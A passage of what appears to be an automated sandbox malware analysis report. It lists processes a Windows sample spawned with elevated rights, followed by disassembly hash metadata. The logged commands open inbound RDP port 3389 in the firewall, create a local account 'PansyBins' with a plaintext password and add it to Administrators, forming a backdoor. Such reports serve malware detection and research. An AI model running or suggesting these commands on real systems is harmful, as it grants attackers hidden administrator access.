                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
                                                                                                            Imagebase:0x7ff62c090000
                                                                                                            File size:96'768 bytes
                                                                                                            MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:moderate
                                                                                                            Has exited:true

                                                                                                            General

                                                                                                            Target ID:9
                                                                                                            Start time:02:55:02
                                                                                                            Start date:02/10/2024
                                                                                                            Path:C:\Windows\System32\drivers\rdpvideominiport.sys
                                                                                                            Wow64 process (32bit):
                                                                                                            Commandline:
                                                                                                            Imagebase:
                                                                                                            File size:32'600 bytes
                                                                                                            MD5 hash:77FF15B9237D62A5CBC6C80E5B20A492
                                                                                                            Has elevated privileges:
                                                                                                            Has administrator privileges:
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:moderate
                                                                                                            Has exited:false

                                                                                                            General

                                                                                                            Target ID:10
                                                                                                            Start time:02:55:02
                                                                                                            Start date:02/10/2024
                                                                                                            Path:C:\Windows\System32\drivers\rdpdr.sys
                                                                                                            Wow64 process (32bit):
                                                                                                            Commandline:
                                                                                                            Imagebase:
                                                                                                            File size:169'984 bytes
                                                                                                            MD5 hash:64991B36F0BD38026F7589572C98E3D6
                                                                                                            Has elevated privileges:
                                                                                                            Has administrator privileges:
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:moderate
                                                                                                            Has exited:false

                                                                                                            General

                                                                                                            Target ID:13
                                                                                                            Start time:02:55:03
                                                                                                            Start date:02/10/2024
                                                                                                            Path:C:\Windows\System32\drivers\tsusbhub.sys
                                                                                                            Wow64 process (32bit):
                                                                                                            Commandline:
                                                                                                            Imagebase:
                                                                                                            File size:137'728 bytes
                                                                                                            MD5 hash:CC6D4A26254EB72C93AC848ECFCFB4AF
                                                                                                            Has elevated privileges:
                                                                                                            Has administrator privileges:
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:moderate
                                                                                                            Has exited:false

                                                                                                            General

                                                                                                            Target ID:16
                                                                                                            Start time:02:55:34
                                                                                                            Start date:02/10/2024
                                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"cmd.exe" /c net user PansyBins WelTW4HnaKt3 /add
                                                                                                            Imagebase:0x410000
                                                                                                            File size:236'544 bytes
                                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            General

                                                                                                            Target ID:17
                                                                                                            Start time:02:55:34
                                                                                                            Start date:02/10/2024
                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                            Imagebase:0x7ff75da10000
                                                                                                            File size:862'208 bytes
                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            General

                                                                                                            Target ID:18
                                                                                                            Start time:02:55:34
                                                                                                            Start date:02/10/2024
                                                                                                            Path:C:\Windows\SysWOW64\net.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:net user PansyBins WelTW4HnaKt3 /add
                                                                                                            Imagebase:0x900000
                                                                                                            File size:47'104 bytes
                                                                                                            MD5 hash:31890A7DE89936F922D44D677F681A7F
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            General

                                                                                                            Target ID:19
                                                                                                            Start time:02:55:34
                                                                                                            Start date:02/10/2024
                                                                                                            Path:C:\Windows\SysWOW64\net1.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:C:\Windows\system32\net1 user PansyBins WelTW4HnaKt3 /add
                                                                                                            Imagebase:0xb10000
                                                                                                            File size:139'776 bytes
                                                                                                            MD5 hash:2EFE6ED4C294AB8A39EB59C80813FEC1
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            General

                                                                                                            Target ID:20
                                                                                                            Start time:02:55:34
                                                                                                            Start date:02/10/2024
                                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"cmd.exe" /c net localgroup
                                                                                                            Imagebase:0x410000
                                                                                                            File size:236'544 bytes
                                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            General

                                                                                                            Target ID:21
                                                                                                            Start time:02:55:34
                                                                                                            Start date:02/10/2024
                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                            Imagebase:0x7ff75da10000
                                                                                                            File size:862'208 bytes
                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Has exited:true

                                                                                                            General

                                                                                                            Target ID:22
                                                                                                            Start time:02:55:35
                                                                                                            Start date:02/10/2024
                                                                                                            Path:C:\Windows\SysWOW64\net.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:net localgroup
                                                                                                            Imagebase:0x900000
                                                                                                            File size:47'104 bytes
                                                                                                            MD5 hash:31890A7DE89936F922D44D677F681A7F
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Has exited:true

                                                                                                            General

                                                                                                            Target ID:23
                                                                                                            Start time:02:55:35
                                                                                                            Start date:02/10/2024
                                                                                                            Path:C:\Windows\SysWOW64\net1.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:C:\Windows\system32\net1 localgroup
                                                                                                            Imagebase:0xb10000
                                                                                                            File size:139'776 bytes
                                                                                                            MD5 hash:2EFE6ED4C294AB8A39EB59C80813FEC1
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Has exited:true

                                                                                                            General

                                                                                                            Target ID:24
                                                                                                            Start time:02:55:35
                                                                                                            Start date:02/10/2024
                                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"cmd.exe" /c netsh advfirewall firewall add rule name="RDP" dir=in action=allow protocol=tcp localport=3389
                                                                                                            Imagebase:0x410000
                                                                                                            File size:236'544 bytes
                                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Has exited:true

                                                                                                            General

                                                                                                            Target ID:25
                                                                                                            Start time:02:55:35
                                                                                                            Start date:02/10/2024
                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                            Imagebase:0x7ff75da10000
                                                                                                            File size:862'208 bytes
                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Has exited:true

                                                                                                            General

                                                                                                            Target ID:26
                                                                                                            Start time:02:55:35
                                                                                                            Start date:02/10/2024
                                                                                                            Path:C:\Windows\SysWOW64\netsh.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:netsh advfirewall firewall add rule name="RDP" dir=in action=allow protocol=tcp localport=3389
                                                                                                            Imagebase:0x1770000
                                                                                                            File size:82'432 bytes
                                                                                                            MD5 hash:4E89A1A088BE715D6C946E55AB07C7DF
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Has exited:true

                                                                                                            General

                                                                                                            Target ID:27
                                                                                                            Start time:02:55:35
                                                                                                            Start date:02/10/2024
                                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"cmd.exe" /c net localgroup "Administrators" PansyBins /add
                                                                                                            Imagebase:0x410000
                                                                                                            File size:236'544 bytes
                                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Has exited:true

                                                                                                            General

                                                                                                            Target ID:28
                                                                                                            Start time:02:55:35
                                                                                                            Start date:02/10/2024
                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                            Imagebase:0x7ff75da10000
                                                                                                            File size:862'208 bytes
                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Has exited:true

                                                                                                            General

                                                                                                            Target ID:29
                                                                                                            Start time:02:55:35
                                                                                                            Start date:02/10/2024
                                                                                                            Path:C:\Windows\SysWOW64\net.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:net localgroup "Administrators" PansyBins /add
                                                                                                            Imagebase:0x900000
                                                                                                            File size:47'104 bytes
                                                                                                            MD5 hash:31890A7DE89936F922D44D677F681A7F
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Has exited:true

                                                                                                            General

                                                                                                            Target ID:30
                                                                                                            Start time:02:55:35
                                                                                                            Start date:02/10/2024
                                                                                                            Path:C:\Windows\SysWOW64\net1.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:C:\Windows\system32\net1 localgroup "Administrators" PansyBins /add
                                                                                                            Imagebase:0xb10000
                                                                                                            File size:139'776 bytes
                                                                                                            MD5 hash:2EFE6ED4C294AB8A39EB59C80813FEC1
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Has exited:true

                                                                                                            Disassembly

                                                                                                            Reset < >

                                                                                                              Executed Functions

                                                                                                              Function 01189379 Relevance: 3.9, Strings: 3, Instructions: 119COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1800019889.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_1180000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: ,kAq$,kAq$,kAq
                                                                                                              • API String ID: 0-2462961495
                                                                                                              • Opcode ID: 8be0ffd83628b6ab768ddd7799aee0335fde74032895c494ef2baa99c775f378
                                                                                                              • Instruction ID: 83167dce3f5512c5b0e74641eb53698690a51d16ccddc5d2fb442934233879b2
                                                                                                              • Opcode Fuzzy Hash: 8be0ffd83628b6ab768ddd7799aee0335fde74032895c494ef2baa99c775f378
                                                                                                              • Instruction Fuzzy Hash: D2418030B00209DFDB28AF69D558ABE7BB5FBC8254F158128E806AB394DF359D45CF90
                                                                                                              Function 011808D8 Relevance: 3.9, Strings: 3, Instructions: 109COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1800019889.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_1180000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: fq$ fq$4'q
                                                                                                              • API String ID: 0-1374027347
                                                                                                              • Opcode ID: 653da191b9fd652480bc60b9acd99f9ccb70077ef3de06d901e04e58230f4195
                                                                                                              • Instruction ID: 4bc397874a1390fadb234d08bb9d477870d9422dfbe68a4ceea24c3ac59c7915
                                                                                                              • Opcode Fuzzy Hash: 653da191b9fd652480bc60b9acd99f9ccb70077ef3de06d901e04e58230f4195
                                                                                                              • Instruction Fuzzy Hash: 66513834A01249DFCB14EFA8E494BEDBBB6FB48300B104469E416EB35ADB356E41CF50
                                                                                                              Function 011808E8 Relevance: 3.9, Strings: 3, Instructions: 104COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1800019889.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_1180000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: fq$ fq$4'q
                                                                                                              • API String ID: 0-1374027347
                                                                                                              • Opcode ID: c2199f73aad191c6c2a17583ccd9bad7325072dd664d1a6640a7cc8ef0c38bf0
                                                                                                              • Instruction ID: 702e01d3121dad6a5652db1a23849dd08f70451bb4f0e8c7e03cfebfac364f74
                                                                                                              • Opcode Fuzzy Hash: c2199f73aad191c6c2a17583ccd9bad7325072dd664d1a6640a7cc8ef0c38bf0
                                                                                                              • Instruction Fuzzy Hash: 1C41F874A01209DFCB54EFA8E494BEDBBB6FB48300B104569E41AEB359DB356E41CF90
                                                                                                              Function 0118446B Relevance: 2.7, Strings: 2, Instructions: 178COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1800019889.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_1180000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: Eet$Eet
                                                                                                              • API String ID: 0-3394885180
                                                                                                              • Opcode ID: 95093ad23d7d5ade5dc7165f69c0216ba50902e789abce7cf41a6d553f4efb7b
                                                                                                              • Instruction ID: 5e226d08c5b5c6de078560b21aac63f20cd21234c2bb20851e853a0d9a571122
                                                                                                              • Opcode Fuzzy Hash: 95093ad23d7d5ade5dc7165f69c0216ba50902e789abce7cf41a6d553f4efb7b
                                                                                                              • Instruction Fuzzy Hash: 63616231B002068FDB15EFA9D99069FB7E6BF88204B108629D405DF359EF70ED058BD1
                                                                                                              Function 01184B88 Relevance: 2.6, Strings: 2, Instructions: 72COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1800019889.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_1180000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: (q$Hq
                                                                                                              • API String ID: 0-1154169777
                                                                                                              • Opcode ID: b52a039da9a70df7f8000d4a51948b11d8c5ce1cbab3b0e0576f98d2229ec154
                                                                                                              • Instruction ID: 2e5e2d8527c6b718f641e0cc3c00e1a32c206acd1b86833c762b0b12db8d33ba
                                                                                                              • Opcode Fuzzy Hash: b52a039da9a70df7f8000d4a51948b11d8c5ce1cbab3b0e0576f98d2229ec154
                                                                                                              • Instruction Fuzzy Hash: 9521CD307003514FD719AB29E860A9E7BE7AFC42103148969D55ACB395DF39AC0A87AA
                                                                                                              Function 01186E03 Relevance: 2.6, Strings: 2, Instructions: 60COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1800019889.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_1180000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: aq$)
                                                                                                              • API String ID: 0-2109781130
                                                                                                              • Opcode ID: 0c3cdcaa106240681f0f1b5b1630bf473ee2bfb274080d070016a56c62a76fd6
                                                                                                              • Instruction ID: 53b5bdf52eb10f5c73746aced9550c3eedd2821734804f6bce29ee51311b3867
                                                                                                              • Opcode Fuzzy Hash: 0c3cdcaa106240681f0f1b5b1630bf473ee2bfb274080d070016a56c62a76fd6
                                                                                                              • Instruction Fuzzy Hash: BA216D74E0020A9FDB18EBA4D8A1AAEBB72FF84201F508569E511BF244DB706D05CB91
                                                                                                              Function 01186E08 Relevance: 2.6, Strings: 2, Instructions: 58COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1800019889.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_1180000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: aq$)
                                                                                                              • API String ID: 0-2109781130
                                                                                                              • Opcode ID: f4e99c518aeb73a8383d627c1b2573931f8f22b95924b969f9dede819e3e7a69
                                                                                                              • Instruction ID: 0cbb708f4e1c56998c3718e26eeffbe69865591c7a79be76339f2aa7b904dc19
                                                                                                              • Opcode Fuzzy Hash: f4e99c518aeb73a8383d627c1b2573931f8f22b95924b969f9dede819e3e7a69
                                                                                                              • Instruction Fuzzy Hash: 3B212E74E4020A9FDB18EBA5D891AAEBB76FF84201F508529E511BF244DF706D05CB91
                                                                                                              Function 01181890 Relevance: 1.5, Strings: 1, Instructions: 261COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1800019889.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_1180000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: q
                                                                                                              • API String ID: 0-1543536600
                                                                                                              • Opcode ID: 0a041bdb5f9f4083f6c1f92130b98a34a7c7ff9c5b7bbd7e09fd1ba32124b8ef
                                                                                                              • Instruction ID: 37565565d913378ae95f6ee523cc432c2811a41db3ebd30f0b30f09420751ea0
                                                                                                              • Opcode Fuzzy Hash: 0a041bdb5f9f4083f6c1f92130b98a34a7c7ff9c5b7bbd7e09fd1ba32124b8ef
                                                                                                              • Instruction Fuzzy Hash: 20B16931A01204AFDB19DF68D884E9DBBF6FF89300B158195E846EB3A5DB35AD41CF50
                                                                                                              Function 01187330 Relevance: 1.5, Strings: 1, Instructions: 205COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1800019889.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_1180000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: (q
                                                                                                              • API String ID: 0-2414175341
                                                                                                              • Opcode ID: e7497dcc735a2d9bb0e5216e555970b2f2ab19818e602af54ec03f4704eea987
                                                                                                              • Instruction ID: 3444378f8cd5bd294216e7e24ff0417c0f95ebd3ee8e8f46f61d39e56891f97c
                                                                                                              • Opcode Fuzzy Hash: e7497dcc735a2d9bb0e5216e555970b2f2ab19818e602af54ec03f4704eea987
                                                                                                              • Instruction Fuzzy Hash: F0716E70B003024FEB28AF69D8507AEB6E6BFC4600B68C56DD486DB394DE35DC01CBA5
                                                                                                              Function 01188E28 Relevance: 1.4, Strings: 1, Instructions: 119COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1800019889.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_1180000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: ,kAq
                                                                                                              • API String ID: 0-1094898869
                                                                                                              • Opcode ID: 90c51ac6e562282b23b042170c60f5ac67d8f3fb7f0e834c15dfcd774d1251fd
                                                                                                              • Instruction ID: bfeb004314f31dfe12972fd1d4dcb6697f6727e978f3ac4e0a426b7562b98bdf
                                                                                                              • Opcode Fuzzy Hash: 90c51ac6e562282b23b042170c60f5ac67d8f3fb7f0e834c15dfcd774d1251fd
                                                                                                              • Instruction Fuzzy Hash: E941C236A002198FCB14EFADD890AAEBBB6FF88210F548065D505E7395DB35EC45CBA1
                                                                                                              Function 01188848 Relevance: 1.3, Strings: 1, Instructions: 96COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1800019889.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_1180000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: P?q
                                                                                                              • API String ID: 0-2823487263
                                                                                                              • Opcode ID: 8cd4afa3f6de6af7313ac4f53169862ae5a2412fe27ff5cf4082d171f7ff62ef
                                                                                                              • Instruction ID: 08c52fcf9039d205120e763d0481eddef400ea79e6c90ebb21cf91cf3e1a58fd
                                                                                                              • Opcode Fuzzy Hash: 8cd4afa3f6de6af7313ac4f53169862ae5a2412fe27ff5cf4082d171f7ff62ef
                                                                                                              • Instruction Fuzzy Hash: C431C031A007049FDB28DF6AC44099EBBF1FF88310B60866DD499AB254DB31AD45CFA1
                                                                                                              Function 01188843 Relevance: 1.3, Strings: 1, Instructions: 74COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1800019889.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_1180000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: P?q
                                                                                                              • API String ID: 0-2823487263
                                                                                                              • Opcode ID: be9e3ad1ac8913462a1d6c6a51f46f6f7b66b96f76a3affa4859f9c037ff9419
                                                                                                              • Instruction ID: 829b58d47461f828206660dc579da05c09c317adf6b944cc86c9d8609b87de78
                                                                                                              • Opcode Fuzzy Hash: be9e3ad1ac8913462a1d6c6a51f46f6f7b66b96f76a3affa4859f9c037ff9419
                                                                                                              • Instruction Fuzzy Hash: 0321AE31A002059FDB28DF69D4909DEBBF1FF89310B148A6DE449AB214DB31AD1ACF91
                                                                                                              Function 01180FC0 Relevance: 1.3, Strings: 1, Instructions: 72COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1800019889.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_1180000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: Teq
                                                                                                              • API String ID: 0-1098410595
                                                                                                              • Opcode ID: 6d264a67630f10a4cb7494c0447b1b806739d19d32bf0556e288d4a95c967dfa
                                                                                                              • Instruction ID: 1e30e2e3b46c7b70f2f3970ef6453d0317e106d214375c3a350a00b3c5ec8aa3
                                                                                                              • Opcode Fuzzy Hash: 6d264a67630f10a4cb7494c0447b1b806739d19d32bf0556e288d4a95c967dfa
                                                                                                              • Instruction Fuzzy Hash: 1621A731B002189FDB18EB69D454B9EBBF6AF8C710F24005AE501EB3A5CF759D01CB91
                                                                                                              Function 01180FB0 Relevance: 1.3, Strings: 1, Instructions: 69COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1800019889.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_1180000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: Teq
                                                                                                              • API String ID: 0-1098410595
                                                                                                              • Opcode ID: c29a58091c8d7fceb1f10651813bb41eac01755cf24fc907f1d9d914950c5bfa
                                                                                                              • Instruction ID: a97596dc29245c0a014c88ead76964739dadca2ab806b96f264824f2edb248fe
                                                                                                              • Opcode Fuzzy Hash: c29a58091c8d7fceb1f10651813bb41eac01755cf24fc907f1d9d914950c5bfa
                                                                                                              • Instruction Fuzzy Hash: A421A131B102149FDB18EB68C855BAE7BF6AF8C700F240469E501EB3A5CFB59D01CB91
                                                                                                              Function 01187D44 Relevance: 1.3, Strings: 1, Instructions: 64COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1800019889.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_1180000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: ,kAq
                                                                                                              • API String ID: 0-1094898869
                                                                                                              • Opcode ID: 6177982fcae4647a0b9d279a177596035d909da039b89499c67d9e39a6712a95
                                                                                                              • Instruction ID: 17ecdcbeb6b6dd23b6eb7eeb108ba065af3c6bb55144d0cd7a5f56e00a792d55
                                                                                                              • Opcode Fuzzy Hash: 6177982fcae4647a0b9d279a177596035d909da039b89499c67d9e39a6712a95
                                                                                                              • Instruction Fuzzy Hash: 92216235A00219CFCB1DEF64D4296EDBBF2BB88600F244569E402A7384CF765C01CFA1
                                                                                                              Function 0118319B Relevance: 1.3, Strings: 1, Instructions: 49COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1800019889.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_1180000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: Teq
                                                                                                              • API String ID: 0-1098410595
                                                                                                              • Opcode ID: c9f949d15a21a1b649b784f33dd42c94425c6421ddc7f5f75e7dbf8bf13c7b8a
                                                                                                              • Instruction ID: 94af826b23dafed48644d8ba8ad6452b592f45f76a616256fe9f9c32f40d9657
                                                                                                              • Opcode Fuzzy Hash: c9f949d15a21a1b649b784f33dd42c94425c6421ddc7f5f75e7dbf8bf13c7b8a
                                                                                                              • Instruction Fuzzy Hash: 90113C34A10219CFCB58EF68C4A8AED7BF2BF8C614F154069E442EB364CB799C41CB91
                                                                                                              Function 011831A0 Relevance: 1.3, Strings: 1, Instructions: 49COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1800019889.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_1180000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: Teq
                                                                                                              • API String ID: 0-1098410595
                                                                                                              • Opcode ID: 4ba468d9c10f58139cf7898b1e16b6697bd3ccd39d218a863f08adf370284c1f
                                                                                                              • Instruction ID: d98a811698ea2f86c3a8a65af556ad3335958093f0a3912b48aedf6415f1379c
                                                                                                              • Opcode Fuzzy Hash: 4ba468d9c10f58139cf7898b1e16b6697bd3ccd39d218a863f08adf370284c1f
                                                                                                              • Instruction Fuzzy Hash: D2113C34A10219CFCB58EF68C458AAD7BF6BF4C610F154069E402E7354CB799C01CB91
                                                                                                              Function 0118777B Relevance: .4, Instructions: 366COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1800019889.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_1180000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
